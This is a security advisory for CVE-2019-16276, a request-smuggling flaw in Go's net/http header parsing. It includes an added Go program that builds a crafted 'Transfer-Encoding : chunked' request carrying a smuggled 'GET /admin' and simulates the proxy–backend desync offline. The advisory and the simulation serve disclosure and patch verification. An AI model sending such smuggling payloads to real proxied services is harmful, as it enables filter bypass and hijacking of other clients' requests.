ASA-2019-00570 – Go: Request Smuggling due to normalization of invalid headers


Allele Security Alert

ASA-2019-00570

Identifier(s)

ASA-2019-00570, CVE-2019-16276

Title

Request Smuggling due to normalization of invalid headers

Vendor(s)

The Go Authors

Product(s)

Go

Affected version(s)

Go versions before 1.13.1
Go versions before 1.12.10

Fixed version(s)

Go version 1.13.1
Go version 1.12.10

Proof of concept

Unknown

Description

Go’s net/http (through net/textproto) used to accept invalid HTTP/1.1 header lines that have whitespace between the field name and the colon, which RFC 7230 forbids (a field-name is a token and the colon must follow it directly), and normalized them by stripping the trailing spaces from the name. A line such as "Transfer-Encoding : chunked" was therefore treated by Go as a Transfer-Encoding header, while a parser that follows the RFC sees an unknown field name and ignores the line. If a Go server is used behind a reverse proxy that accepts and forwards but doesn’t normalize such invalid headers, the reverse proxy and the server can interpret the same request differently. This can lead to filter bypasses (a header the proxy is supposed to strip or block slips past its check and is still honoured by Go) or to request smuggling, the latter if requests from separate clients are multiplexed onto the same backend connection by the proxy, because the two sides then disagree on where one request’s body ends and the next request begins.
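The Go program below is an added illustration and is not part of this alert or of the Go project’s own code. It builds a constructed attacker request whose Transfer-Encoding line has a space before the colon and frames the body twice: once the way an RFC 7230 parser does (the reverse proxy, and Go 1.13.1 or later), keeping the malformed field name verbatim, and once the way Go before 1.13.1 did, stripping the trailing space so the header is recognised. The proxy honours Content-Length and forwards the whole body; the old backend honours the normalized Transfer-Encoding, consumes only the empty chunked body and leaves a second request on the connection, which is the desync pattern described in the PortSwigger reference listed below. It also asks the running toolchain’s net/textproto whether it still normalizes the line, which is the check to run against a suspect build. The request, the host name and all helper names are assumptions made for this example.

```go
package main

import (
	"bufio"
	"fmt"
	"net/textproto"
	"strconv"
	"strings"
)

// Constructed attacker request, not a real capture: Transfer-Encoding has a space
// before its colon (forbidden by RFC 7230) and Content-Length covers the whole body.
var (
	smuggledTail = "GET /admin HTTP/1.1\r\nHost: example.internal\r\n\r\n"
	attackBody   = "0\r\n\r\n" + smuggledTail
	rawRequest   = "POST / HTTP/1.1\r\nHost: example.internal\r\n" +
		"Content-Length: " + strconv.Itoa(len(attackBody)) + "\r\n" +
		"Transfer-Encoding : chunked\r\n\r\n" + attackBody
)

// parseHeaders models both sides. lenient=true is Go before 1.13.1 (trailing spaces
// in the field name are stripped, so "Transfer-Encoding " is recognised); lenient=false
// is an RFC 7230 parser and Go 1.13.1+ (the name is kept verbatim; CanonicalMIMEHeaderKey,
// which Add and Get use, leaves names containing spaces untouched, so it never matches).
func parseHeaders(lines []string, lenient bool) textproto.MIMEHeader {
	h := textproto.MIMEHeader{}
	for _, line := range lines {
		i := strings.Index(line, ":")
		if i < 0 {
			continue
		}
		name := line[:i]
		if lenient {
			name = strings.TrimRight(name, " ")
		}
		h.Add(name, strings.TrimSpace(line[i+1:]))
	}
	return h
}

// chunkedLength walks a chunked body (extensions and trailers ignored) and returns
// the offset just past the zero-size chunk and its final CRLF.
func chunkedLength(body string) (int, error) {
	pos := 0
	for {
		eol := strings.Index(body[pos:], "\r\n")
		if eol < 0 {
			return 0, fmt.Errorf("truncated chunked body")
		}
		size, err := strconv.ParseInt(body[pos:pos+eol], 16, 64)
		pos += eol + 2 + int(size) + 2 // size line, chunk data, CRLF
		if err != nil || pos > len(body) {
			return 0, fmt.Errorf("malformed chunked body: %v", err)
		}
		if size == 0 {
			return pos, nil
		}
	}
}

// leftover parses one request with the given header behaviour, frames the body per
// RFC 7230 section 3.3.3 (Transfer-Encoding wins over Content-Length) and returns
// what stays unread on the connection: non-empty means a smuggled request.
func leftover(raw string, lenient bool) (string, error) {
	i := strings.Index(raw, "\r\n\r\n")
	if i < 0 {
		return "", fmt.Errorf("no end of headers")
	}
	h := parseHeaders(strings.Split(raw[:i], "\r\n")[1:], lenient) // [1:] drops the request line
	body := raw[i+4:]
	n, err := 0, error(nil)
	switch {
	case h.Get("Transfer-Encoding") == "chunked":
		n, err = chunkedLength(body)
	case h.Get("Content-Length") != "":
		n, err = strconv.Atoi(h.Get("Content-Length"))
	}
	if err != nil || n < 0 || n > len(body) {
		return "", fmt.Errorf("bad framing (n=%d, err=%v)", n, err)
	}
	return body[n:], nil
}

// stdlibSeesTransferEncoding asks the running toolchain's net/textproto whether the
// space-before-colon line yields a Transfer-Encoding header. From 1.13.1 on it does
// not: the name stays verbatim, or newer releases reject the header block outright.
func stdlibSeesTransferEncoding(raw string) (bool, error) {
	tp := textproto.NewReader(bufio.NewReader(strings.NewReader(raw)))
	if _, err := tp.ReadLine(); err != nil { // skip the request line
		return false, err
	}
	h, err := tp.ReadMIMEHeader()
	if err != nil {
		return false, err
	}
	return h.Get("Transfer-Encoding") != "", nil
}

func main() {
	proxy, _ := leftover(rawRequest, false)
	oldGo, _ := leftover(rawRequest, true)
	seen, err := stdlibSeesTransferEncoding(rawRequest)
	fmt.Printf("RFC 7230 proxy leftover=%q\nGo before 1.13.1 leftover=%q\n", proxy, oldGo)
	fmt.Printf("this toolchain's net/textproto sees Transfer-Encoding: %v (err=%v)\n", seen, err)
}
```

Run it with go run: the pre-1.13.1 line prints the smuggled GET /admin as leftover while the proxy line prints nothing, which is exactly the disagreement the two sides of a proxied deployment would have. Upgrading the backend to one of the fixed versions listed above removes the normalization; stdlibSeesTransferEncoding is the quick way to confirm which behaviour a given toolchain has, since it exercises the real net/textproto rather than the model.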

Technical details

Unknown

Credits

Unknown

Reference(s)

net/http: invalid headers are normalized, allowing request smuggling #34540
https://github.com/golang/go/issues/34540

197503: net/textproto: don’t normalize headers with spaces before the colon
https://go-review.googlesource.com/c/go/+/197503/

Analysis of Two Newly Patched Kubernetes Vulnerabilities
https://blog.paloaltonetworks.com/2019/10/cloud-kubernetes-vulnerabilities/

[ANNOUNCE] Security Advisory for CVE-2019-16276
https://groups.google.com/forum/?utm_medium=email&utm_source=footer#!topic/kubernetes-security-announce/PtsUCqFi4h4

HTTP Desync Attacks: Request Smuggling Reborn
https://portswigger.net/blog/http-desync-attacks-request-smuggling-reborn

CVE-2019-16276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16276

CVE-2019-16276
https://nvd.nist.gov/vuln/detail/CVE-2019-16276

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: October 17, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.